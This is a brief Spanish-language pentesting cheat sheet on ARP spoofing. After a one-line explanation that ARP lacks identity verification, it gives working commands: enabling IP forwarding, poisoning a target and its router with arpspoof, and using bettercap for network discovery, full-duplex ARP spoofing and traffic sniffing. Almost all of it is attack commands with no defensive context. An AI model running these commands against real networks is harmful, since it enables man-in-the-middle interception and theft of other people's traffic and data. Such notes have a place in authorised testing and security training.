Este tipo de ataques permite enviar paquetes falsificados ARP con el fin de una denegación de servicio o un ataque MITM. Esto es posible debido a que este protocolo no tiene mecanismos de verificación de identidad.
Explotación
Arpspoof tool
echo 1 > /proc/sys/net/ipv4/ip_forward # Enable ip forwarding
arpspoof -i ens33 -t <TARGET-IP> -r <ROUTER-IP> # Telling to the client im the router
arpspoof -i ens33 -t 192.168.1.1 192.168.1.9 # Telling to the router im the client
Bettercap
# Turning on bettercap
bettercap -iface <interface>
# Network discovery
net.probe on/off
net.recon on/off
# Enabling arp-spoof
set arp.spoof.fullduplex true # Intercep traffic between router and target
set arp.spoof.targets <ip-target>
arp.spoof on
# Capture data with bettercap
net.sniff.local on/off # local machine traffic
net.sniff on/off